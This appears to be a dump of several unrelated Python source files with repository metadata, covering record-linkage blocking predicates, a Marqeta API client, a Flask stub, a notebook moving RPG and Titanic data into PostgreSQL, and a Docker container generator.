self.field = field
self.threshold = threshold
self.index = None
def __getstate__(self):
odict = self.__dict__.copy()
odict['index'] = None
return odict
def __setstate__(self, d):
self.__dict__.update(d)
# backwards compatibility
if not hasattr(self, 'index'):
self.index = None
def reset(self):
...
def bust_cache(self):
self._cache = {}
class CanopyPredicate(object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.canopy = {}
self._cache = {}
def freeze(self, records):
self._cache = {record[self.field]: self(record) for record in records}
self.canopy = {}
self.index = None
def reset(self):
self._cache = {}
self.canopy = {}
self.index = None
def __call__(self, record, **kwargs):
block_key = None
column = record[self.field]
if column:
if column in self._cache:
return self._cache[column]
doc = self.preprocess(column)
try:
doc_id = self.index._doc_to_id[doc]
except AttributeError:
raise AttributeError("Attempting to block with an index "
"predicate without indexing records")
if doc_id in self.canopy:
block_key = self.canopy[doc_id]
else:
canopy_members = self.index.search(doc,
self.threshold)
for member in canopy_members:
if member not in self.canopy:
self.canopy[member] = doc_id
if canopy_members:
block_key = doc_id
self.canopy[doc_id] = doc_id
else:
self.canopy[doc_id] = None
if block_key is None:
return []
else:
return [str(block_key)]
class SearchPredicate(object):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cache = {}
def freeze(self, records_1, records_2):
self._cache = {(record[self.field], False): self(record, False)
for record in records_1}
self._cache.update({(record[self.field], True): self(record, True)
for record in records_2})
self.index = None
def reset(self):
self._cache = {}
self.index = None
def __call__(self, record, target=False, **kwargs):
column = record[self.field]
if column:
if (column, target) in self._cache:
return self._cache[(column, target)]
else:
doc = self.preprocess(column)
try:
if target:
centers = [self.index._doc_to_id[doc]]
else:
centers = self.index.search(doc, self.threshold)
except AttributeError:
raise AttributeError("Attempting to block with an index "
"predicate without indexing records")
result = [str(center) for center in centers]
self._cache[(column, target)] = result
return result
else:
return ()
class TfidfPredicate(IndexPredicate):
def initIndex(self):
self.reset()
return tfidf.TfIdfIndex()
class TfidfCanopyPredicate(CanopyPredicate, TfidfPredicate):
pass
class TfidfSearchPredicate(SearchPredicate, TfidfPredicate):
pass
class TfidfTextPredicate(object):
def preprocess(self, doc):
return tuple(words(doc))
class TfidfSetPredicate(object):
def preprocess(self, doc):
return doc
class TfidfNGramPredicate(object):
def preprocess(self, doc):
return tuple(sorted(ngrams(" ".join(strip_punc(doc).split()), 2)))
class TfidfTextSearchPredicate(TfidfTextPredicate,
TfidfSearchPredicate):
type = "TfidfTextSearchPredicate"
class TfidfSetSearchPredicate(TfidfSetPredicate,
TfidfSearchPredicate):
type = "TfidfSetSearchPredicate"
class TfidfNGramSearchPredicate(TfidfNGramPredicate,
TfidfSearchPredicate):
type = "TfidfNGramSearchPredicate"
class TfidfTextCanopyPredicate(TfidfTextPredicate,
TfidfCanopyPredicate):
type = "TfidfTextCanopyPredicate"
class TfidfSetCanopyPredicate(TfidfSetPredicate,
TfidfCanopyPredicate):
type = "TfidfSetCanopyPredicate"
class TfidfNGramCanopyPredicate(TfidfNGramPredicate,
TfidfCanopyPredicate):
type = "TfidfNGramCanopyPredicate"
class LevenshteinPredicate(IndexPredicate):
def initIndex(self):
self.reset()
return levenshtein.LevenshteinIndex()
def preprocess(self, doc):
return " ".join(strip_punc(doc).split())
class LevenshteinCanopyPredicate(CanopyPredicate, LevenshteinPredicate):
type = "LevenshteinCanopyPredicate"
class LevenshteinSearchPredicate(SearchPredicate, LevenshteinPredicate):
type = "LevenshteinSearchPredicate"
class CompoundPredicate(tuple, Predicate):
type = "CompoundPredicate"
def __hash__(self):
try:
return self._cached_hash
except AttributeError:
h = self._cached_hash = hash(frozenset(self))
return h
def __eq__(self, other):
return frozenset(self) == frozenset(other)
def __call__(self, record, **kwargs):
predicate_keys = [predicate(record, **kwargs)
for predicate in self]
return [
u':'.join(
# must escape : to avoid confusion with : join separator
b.replace(u':', u'\\:') for b in block_key
)
for block_key
in itertools.product(*predicate_keys)
]
def __add__(self, other: Predicate) -> 'CompoundPredicate': # type: ignore
if isinstance(other, CompoundPredicate):
return CompoundPredicate(tuple(self) + tuple(other))
elif isinstance(other, Predicate):
return CompoundPredicate(tuple(self) + (other,))
else:
raise ValueError('Can only combine predicates')
def wholeFieldPredicate(field: Any) -> Tuple[str]:
"""return the whole field"""
return (str(field), )
def tokenFieldPredicate(field):
"""returns the tokens"""
return set(words(field))
def firstTokenPredicate(field: str) -> Sequence[str]:
first_token = start_word(field)
if first_token:
return first_token.groups()
else:
return ()
def firstTwoTokensPredicate(field: str) -> Sequence[str]:
first_two_tokens = two_start_words(field)
if first_two_tokens:
return first_two_tokens.groups()
else:
return ()
def commonIntegerPredicate(field: str) -> Set[str]:
"""return any integers"""
return {str(int(i)) for i in integers(field)}
def alphaNumericPredicate(field: str) -> Set[str]:
return set(alpha_numeric(field))
def nearIntegersPredicate(field: str) -> Set[str]:
"""return any integers N, N+1, and N-1"""
ints = integers(field)
near_ints = set()
for char in ints:
num = int(char)
near_ints.add(str(num - 1))
near_ints.add(str(num))
near_ints.add(str(num + 1))
return near_ints
def hundredIntegerPredicate(field: str) -> Set[str]:
return {str(int(i))[:-2] + '00' for i in integers(field)}
def hundredIntegersOddPredicate(field: str) -> Set[str]:
return {str(int(i))[:-2] + '0' + str(int(i) % 2) for i in integers(field)}
def firstIntegerPredicate(field: str) -> Sequence[str]:
first_token = start_integer(field)
if first_token:
return first_token.groups()
else:
return ()
def ngramsTokens(field: Sequence[Any], n: int) -> Set[str]:
grams = set()
n_tokens = len(field)
for i in range(n_tokens):
for j in range(i + n, min(n_tokens, i + n) + 1):
grams.add(' '.join(str(tok) for tok in field[i:j]))
return grams
def commonTwoTokens(field: str) -> Set[str]:
return ngramsTokens(field.split(), 2)
def commonThreeTokens(field: str) -> Set[str]:
return ngramsTokens(field.split(), 3)
def fingerprint(field: str) -> Tuple[str]:
return (u''.join(sorted(field.split())).strip(),)
def oneGramFingerprint(field: str) -> Tuple[str]:
return (u''.join(sorted(set(ngrams(field.replace(' ', ''), 1)))).strip(),)
def twoGramFingerprint(field: str) -> Tuple[str, ...]:
if len(field) > 1:
return (u''.join(sorted(gram.strip() for gram
in set(ngrams(field.replace(' ', ''), 2)))),)
else:
return ()
def commonFourGram(field: str) -> Set[str]:
"""return 4-grams"""
return set(ngrams(field.replace(' ', ''), 4))
def commonSixGram(field: str) -> Set[str]:
"""return 6-grams"""
return set(ngrams(field.replace(' ', ''), 6))
def sameThreeCharStartPredicate(field: str) -> Tuple[str]:
"""return first three characters"""
return initials(field.replace(' ', ''), 3)
def sameFiveCharStartPredicate(field: str) -> Tuple[str]:
"""return first five characters"""
return initials(field.replace(' ', ''), 5)
def sameSevenCharStartPredicate(field: str) -> Tuple[str]:
"""return first seven characters"""
return initials(field.replace(' ', ''), 7)
def suffixArray(field):
n = len(field) - 4
if n > 0:
for i in range(0, n):
yield field[i:]
def sortedAcronym(field: str) -> Tuple[str]:
return (''.join(sorted(each[0] for each in field.split())),)
def doubleMetaphone(field):
return {metaphone for metaphone in doublemetaphone(field) if metaphone}
def metaphoneToken(field):
return {metaphone_token for metaphone_token
in itertools.chain(*(doublemetaphone(token)
for token in set(field.split())))
if metaphone_token}
def wholeSetPredicate(field_set):
return (str(field_set),)
def commonSetElementPredicate(field_set):
"""return set as individual elements"""
return tuple([str(each) for each in field_set])
def commonTwoElementsPredicate(field):
sequence = sorted(field)
return ngramsTokens(sequence, 2)
def commonThreeElementsPredicate(field):
sequence = sorted(field)
return ngramsTokens(sequence, 3)
def lastSetElementPredicate(field_set):
return (str(max(field_set)), )
def firstSetElementPredicate(field_set):
return (str(min(field_set)), )
def magnitudeOfCardinality(field_set):
return orderOfMagnitude(len(field_set))
def latLongGridPredicate(field, digits=1):
"""
Given a lat / long pair, return the grid coordinates at the
nearest base value. e.g., (42.3, -5.4) returns a grid at 0.1
degree resolution of 0.1 degrees of latitude ~ 7km, so this is
effectively a 14km lat grid. This is imprecise for longitude,
since 1 degree of longitude is 0km at the poles, and up to 111km
at the equator. But it should be reasonably precise given some
prior logical block (e.g., country).
"""
if any(field):
return (str([round(dim, digits) for dim in field]),)
else:
return ()
def orderOfMagnitude(field):
if field > 0:
return (str(int(round(math.log10(field)))), )
else:
return ()
def roundTo1(field): # thanks http://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python
abs_num = abs(field)
order = int(math.floor(math.log10(abs_num)))
rounded = round(abs_num, -order)
return (str(int(math.copysign(rounded, field))),)
| 27.320442 | 128 | 0.605999 | 1,614 | 14,835 | 5.42689 | 0.193928 | 0.018267 | 0.011303 | 0.014385 | 0.350154 | 0.289987 | 0.206645 | 0.146592 | 0.11394 | 0.062336 | 0 | 0.006421 | 0.275632 | 14,835 | 542 | 129 | 27.370849 | 0.808673 | 0.0606 | 0 | 0.324022 | 0 | 0 | 0.043566 | 0.014161 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201117 | false | 0.00838 | 0.030726 | 0.064246 | 0.53352 | 0.00838 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
81adeaf2be84207841c2e9a9efa4f432086af04a | 449 | py | Python | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | fdk_client/application/models/RequiredFields.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | [
"MIT"
] | null | null | null | """Application Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .PlatformEmail import PlatformEmail
from .PlatformMobile import PlatformMobile
class RequiredFields(BaseSchema):
# User swagger.json
email = fields.Nested(PlatformEmail, required=False)
mobile = fields.Nested(PlatformMobile, required=False)
| 20.409091 | 58 | 0.759465 | 46 | 449 | 7.413043 | 0.5 | 0.087977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164811 | 449 | 21 | 59 | 21.380952 | 0.909333 | 0.084633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
81b9f2a479158049625581a3437a704893cdd0d3 | 462 | py | Python | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | null | null | null | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | null | null | null | example_snippets/multimenus_snippets/Snippets/Python/Regular expressions/Substitution with backreferences.py | kuanpern/jupyterlab-snippets-multimenus | 477f51cfdbad7409eab45abe53cf774cd70f380c | [
"BSD-3-Clause"
] | 1 | 2021-02-04T04:51:48.000Z | 2021-02-04T04:51:48.000Z | string = "John Doe lives at 221B Baker Street."
pattern = re.compile(r"""
([a-zA-Z ]+) # Save as many letters and spaces as possible to group 1
\ lives\ at\ # Match " lives at "
(?P<address>.*) # Save everything in between as a group named `address`
\. # Match the period at the end
""", re.VERBOSE)
new_string = re.sub(pattern, r"\g<address> is occupied by \1.", string)
print("New string is '{0}'".format(new_string)) | 51.333333 | 78 | 0.614719 | 71 | 462 | 3.971831 | 0.633803 | 0.074468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017094 | 0.24026 | 462 | 9 | 79 | 51.333333 | 0.786325 | 0 | 0 | 0 | 0 | 0 | 0.730022 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
81c4fb7bbe69bd100140a23c7b95e8224c804d6e | 300 | py | Python | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | hello.py | mmastin/twitoff_DS9 | 4381726b07f1058e19083f6c61959722a1ecc578 | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask(__name__)
# make the route
@app.route('/')
# now define a function
def hello():
return render_template('home.html')
# make a second route
@app.route('/about')
# now make a function that goes with about
def preds():
return render_template('about.html') | 17.647059 | 42 | 0.703333 | 45 | 300 | 4.555556 | 0.555556 | 0.078049 | 0.126829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173333 | 300 | 17 | 43 | 17.647059 | 0.826613 | 0.323333 | 0 | 0 | 0 | 0 | 0.130653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
81d5634a2259287c2750b2a915db2f6699799f39 | 4,531 | py | Python | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 21 | 2019-04-12T09:02:17.000Z | 2022-02-18T11:39:06.000Z | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 1 | 2020-07-22T21:27:40.000Z | 2020-07-23T17:38:43.000Z | marqeta/resources/velocity_controls.py | marqeta/marqeta-python | 66fa690eb910825c510a391720b0fe717fac0234 | [
"MIT"
] | 10 | 2019-05-08T14:20:37.000Z | 2021-09-20T18:09:26.000Z |
'''VELOCITYCONTROLS RESOURCE WITH CRU PARAMETERS'''
from marqeta.resources.collection import Collection
from marqeta.response_models.velocity_control_response import VelocityControlResponse
class VelocityControlsCollection(object):
'''
Marqeta API 'velocitycontrols' endpoint list, create, find and update operations
'''
_endpoint = 'velocitycontrols'
def __init__(self, client):
'''
Creates a client collection object
:param client: client object
'''
self.client = client
self.collections = Collection(self.client, VelocityControlResponse)
def page(self, count=5, start_index=0, params=None):
'''
Provides the requested page for velocitycontrols
:param count: data to be displayed per page
:param start_index: start_index
:param params: query parameters
:return: requested page with VelocityControlResponse object for the requested
page 'data'field
'''
return self.collections.page(endpoint=self._endpoint, count=count, start_index=start_index, query_params=params)
def page_available_for_user(self, token, count=5, start_index=0, params=None):
'''
Provides the requested page for velocitycontrols
:param token: user token
:param count: data to be displayed per page
:param start_index: start_index
:param params: query parameters
:return: requested page with VelocityControlResponse object for the requested
page 'data'field
'''
return self.collections.page(endpoint=self._endpoint + '/user/{}/available'.format(token),
count=count, start_index=start_index, query_params=params)
def stream(self, params=None):
'''
Stream through the list of requested endpoint data field
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.stream(endpoint=self._endpoint, query_params=params)
def stream_available_for_user(self, token, params=None):
'''
Stream through the list of requested endpoint data field
:param token: user token
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.stream(endpoint=self._endpoint + '/user/{}/available'.format(token),
query_params=params)
def list(self, params=None, limit=None):
'''
List all the velocitycontrols
:param params: query parameters
:param limit: parameter to limit the list count
:return: List of VelocityControlResponse object
'''
return self.collections.list(endpoint=self._endpoint, query_params=params, limit=limit)
def list_available_for_user(self, token, params=None, limit=None):
'''
Stream through the list of requested endpoint data field
:param token: user token
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.list(endpoint=self._endpoint + '/user/{}/available'.format(token),
query_params=params, limit=limit)
def create(self, data, params=None):
'''
Creates an velocitycontrols object
:param data: data required for creation
:param params: query parameters
:return: VelocityControlResponse object of the created velocitycontrols
'''
return self.collections.create(endpoint=self._endpoint, query_params=params, data=data)
def find(self, token, params=None):
'''
Finds the existing velocitycontrols
:param token: velocitycontrols token to find
:param params: query parameters
:return: VelocityControlResponse object
'''
return self.collections.find(endpoint=self._endpoint + '/{}'.format(token),
query_params=params)
def save(self, token, data):
'''
Updates the existing velocitycontrols data
:param token: velocitycontrols token to update
:param data: data to be updated
:return: VelocityControlResponse object of the updated velocitycontrols
'''
return self.collections.save(data, endpoint=self._endpoint + '/{}'.format(token))
def __repr__(self):
return '<Marqeta.resources.velocity_controls.VelocityControlsCollection>'
| 43.990291 | 120 | 0.659457 | 474 | 4,531 | 6.200422 | 0.158228 | 0.051038 | 0.064308 | 0.070772 | 0.654304 | 0.58081 | 0.536237 | 0.4869 | 0.4869 | 0.460361 | 0 | 0.001191 | 0.258883 | 4,531 | 102 | 121 | 44.421569 | 0.874032 | 0.406753 | 0 | 0.064516 | 0 | 0 | 0.06425 | 0.029371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.354839 | false | 0 | 0.064516 | 0.032258 | 0.806452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
81d98138bcb490cbe03c73366c97626ca649f230 | 215 | py | Python | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | my-ip-address.py | slunart/PythonScripts | f56ccccc513283c21522d7042dfcdd6ebca2702f | [
"MIT"
] | null | null | null | # Script to show your public ip
# Author: Samuel Martins <samuel@samuelmartins.com.br>
# MIT License
from requests import get
ip = get('https://api.ipify.org').text
print ('My public IP address is: '+ ip)
| 23.888889 | 55 | 0.693023 | 33 | 215 | 4.515152 | 0.818182 | 0.107383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 215 | 8 | 56 | 26.875 | 0.851429 | 0.437209 | 0 | 0 | 0 | 0 | 0.422018 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
81e5cfe5737a1d94935c43c37b5b32520793f73a | 816 | py | Python | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | 8 | 2016-09-07T01:59:31.000Z | 2021-03-06T12:14:31.000Z | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | null | null | null | scripts/pughpore/randomwalk/plot_filter.py | jhwnkim/nanopores | 98b3dbb5d36464fbdc03f59d224d38e4255324ce | [
"MIT"
] | 4 | 2017-12-06T17:43:01.000Z | 2020-05-01T05:41:14.000Z | import os
import sys
start = int(sys.argv[2])
fieldsname = sys.argv[1]
import nanopores as nano
import nanopores.geometries.pughpore as pughpore
geop = nano.Params(pughpore.params)
hpore = geop.hpore
import os
HOME = os.path.expanduser("~")
PAPERDIR = os.path.join(HOME, "papers", "paper-howorka")
FIGDIR = os.path.join(PAPERDIR, "figures", "")
DATADIR = os.path.join(HOME,"Dropbox", "nanopores", "fields")
import nanopores.tools.fields as fields
fields.set_dir(DATADIR)
params=dict(avgbind1=23e6,avgbind2=3e4,P_bind1=0.035,P_bind2=3e-1,z0=hpore/2.+0.)
data=fields.get_fields(fieldsname,**params)
samples=len(data["a"])
from create_plot_filter import save_fig_filter
#for i in [start]:
for i in range(start,samples):
print '%i out of %i' %(i,samples)
save_fig_filter(params,fieldsname,i)
fields.update()
| 28.137931 | 81 | 0.745098 | 130 | 816 | 4.6 | 0.492308 | 0.040134 | 0.050167 | 0.046823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027322 | 0.102941 | 816 | 28 | 82 | 29.142857 | 0.789617 | 0.020833 | 0 | 0.086957 | 0 | 0 | 0.077694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.304348 | null | null | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
c490105031241616af96544f2f0d06147e74634a | 2,598 | py | Python | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/assignment_2_postgresql.py | ash827/DS-Unit-3-Sprint-2-SQL-and-Databases | 7538d0264b93256c980ae11097f73893bf64fdc0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Assignment 2 PostgreSQL.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1RaFLSTAwoZ8IeLg27YQqhnMe-g3Vtt4m
POSTGRES DEMO
"""
!pip install psycopg2-binary
import psycopg2
import os
from dotenv import load_dotenv
load_dotenv()
"""1. Establish connection
2. Cursor
3. Execute query
4. Get RESULTS!
"""
DB_HOST = os.getenv("DB_HOST", default="OOPS")
DB_NAME = os.getenv("DB_NAME", default="OOPS")
DB_USER = os.getenv("DB_USER", default="OOPS")
DB_PASSWORD = os.getenv("DB_PASSWORD", default="OOPS")
connection = psycopg2.connect(
dbname=DB_NAME,
user=DB_USER,
password=DB_PASSWORD,
host=DB_HOST
)
cursor = connection.cursor()
cursor.execute('SELECT * from playground;')
results = cursor.fetchall()
print(results)
"""##Working with the rpg database"""
import sqlite3
import pandas as pd
conn = sqlite3.connect('rpg_db (1).sqlite3')
sl_cursor = conn.cursor()
count = sl_cursor.execute('SELECT COUNT(*) FROM charactercreator_character;').fetchall()
count
characters = sl_cursor.execute('SELECT * FROM charactercreator_character').fetchall()
characters
#This shows us the schema
sl_cursor.execute('PRAGMA table_info(charactercreator_character);').fetchall()
create_character_table = '''
CREATE TABLE character_table (
character_id SERIAL PRIMARY KEY,
name VARCHAR(100),
level INT,
exp INT,
hp INT,
strength INT,
intelligence INT,
dexterity INT,
wisdom INT
);
'''
pg_cursor.execute(create_character_table)
pg_cursor.execute("INSERT INTO character_table VALUES (1, 'Aliquid iste optio reiciendi, 0, 0, 10, 1, 1, 1, 1');")
for character in characters:
print("INSERT INTO character_table VALUES " + str(character) + '.')
"""#Titanic Data for Assignment"""
!wget 'https://raw.githubusercontent.com/ash827/DS-Unit-3-Sprint-2-SQL-and-Databases/master/module2-sql-for-analysis/titanic.csv'
import pandas as pd
df_titanic = pd.read_csv('https://raw.githubusercontent.com/ash827/DS-Unit-3-Sprint-2-SQL-and-Databases/master/module2-sql-for-analysis/titanic.csv')
df_titanic.shape
df_titanic.columns.tolist()
df_titanic = df_titanic.reindex(columns = ['Name', 'Age', 'Sex', 'Pclass', 'Fare', 'Siblings/Spouses Aboard', 'Parents/Children Aboard', 'Survived'])
#The columns are now in a nice order :)
"""##Using sqlite3 with the Titanic data
#Having trouble getting the titanic information to load as a db?
"""
conn = sqlite3.connect('titanic.csv')
ti_cursor = conn.cursor()
count = ti_cursor.execute('SELECT COUNT(*) FROM Name;').fetchall()
count
| 22.591304 | 149 | 0.7398 | 359 | 2,598 | 5.239554 | 0.426184 | 0.048379 | 0.021265 | 0.024455 | 0.167996 | 0.106326 | 0.106326 | 0.106326 | 0.106326 | 0.106326 | 0 | 0.019806 | 0.125481 | 2,598 | 114 | 150 | 22.789474 | 0.808099 | 0.031948 | 0 | 0.072727 | 1 | 0.054545 | 0.43677 | 0.044747 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.036364 | 0.109091 | null | null | 0.072727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
c499a3db3dd1f141dd8c4ed0c581fda7ac9acbcb | 290 | py | Python | bc_health_io/reputation/admin.py | catedt/bc_health_io | 1942441067d731075a78d3082b83b706aa1e340f | [
"MIT"
] | 2 | 2020-12-08T21:51:10.000Z | 2021-02-01T07:59:41.000Z | bc_health_io/reputation/admin.py | catedt/bc-health-io | 1942441067d731075a78d3082b83b706aa1e340f | [
"MIT"
] | null | null | null | bc_health_io/reputation/admin.py | catedt/bc-health-io | 1942441067d731075a78d3082b83b706aa1e340f | [
"MIT"
] | null | null | null | from django.contrib import admin
from reputation.models import Reputation
class ReputationAdmin(admin.ModelAdmin):
fieldsets = [
('Reputation', {'fields': ['doctorId', 'email', 'repute', 'createDate', 'updateDate']}),
]
admin.site.register(Reputation, ReputationAdmin)
| 22.307692 | 96 | 0.706897 | 27 | 290 | 7.592593 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151724 | 290 | 12 | 97 | 24.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
c49bb4178d6be1be67e88612c552ea3c26620140 | 29,803 | py | Python | scripts/container_generator/container.py | NETHINKS/opennms-docker-env | 69e8a9cbb13d105ae25d64a6618c41dd1a85a12a | [
"MIT"
] | 1 | 2019-12-09T16:44:03.000Z | 2019-12-09T16:44:03.000Z | scripts/container_generator/container.py | NETHINKS/opennms-docker-env | 69e8a9cbb13d105ae25d64a6618c41dd1a85a12a | [
"MIT"
] | 5 | 2017-05-01T08:00:44.000Z | 2017-06-28T09:25:46.000Z | scripts/container_generator/container.py | NETHINKS/opennms-docker-env | 69e8a9cbb13d105ae25d64a6618c41dd1a85a12a | [
"MIT"
] | null | null | null | """ Container module.
This module defines the container definitions for container_generator.
"""
import os
import time
import hashlib
from collections import OrderedDict
from OpenSSL import crypto
from template_engine import TemplateEngine
from docker import DockerImage
from docker import DockerServiceConfig
class Container(object):
"""Abstract definition of a container
This class represents an abstract definition of a container. It should not
be used directly. Instead a subclass which extends this class should be
used.
Attributes:
container_name: unique name of the container
output_basedir: base directory for output data
Usage:
A subclass of this should at first be initialized with __init__().
The method get_default_parameters() returns all parameters for a
container with default values. After that, the setup_container() method
creates all configuration and files needed for the specific container.
"""
default_parameters = OrderedDict()
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
self._container_name = container_name
self._container_parameters = OrderedDict()
self._container_proxylocations = []
self._container_outputdir = output_basedir + "/init/" + container_name
self._container_imagedir = output_basedir + "/images/"
self._container_imagename = self._container_name + ".tar"
self._container_namedvolumes = []
self._container_config = DockerServiceConfig(container_name)
self._app_config = app_config
# create output directories if not exist
os.makedirs(self._container_outputdir, exist_ok=True)
# init with default_parameters
self._container_parameters = type(self).default_parameters
def get_name(self):
"""Returns the container name"""
return self._container_name
def get_image_filename(self):
"""Returns the filename for the stored image"""
return "images/" + self._container_imagename
def setup_container(self, parameters):
"""Setup an container
This method must be implemented by a subclass. The following things
should be done in this method:
- setup proxy locations in self._container_proxylocations
- create container config in self._container_config
Args:
parameters: parameters for the container
"""
pass
def get_container_config(self):
"""Return the container config
Return:
The container config as DockerServiceConfig object
"""
return self._container_config
def get_proxy_locations(self):
"""Return all proxy locations that should be created for this one"""
return self._container_proxylocations
def get_named_volumes(self):
"""Return a list with all configured named volumes"""
return self._container_namedvolumes
def download_image(self):
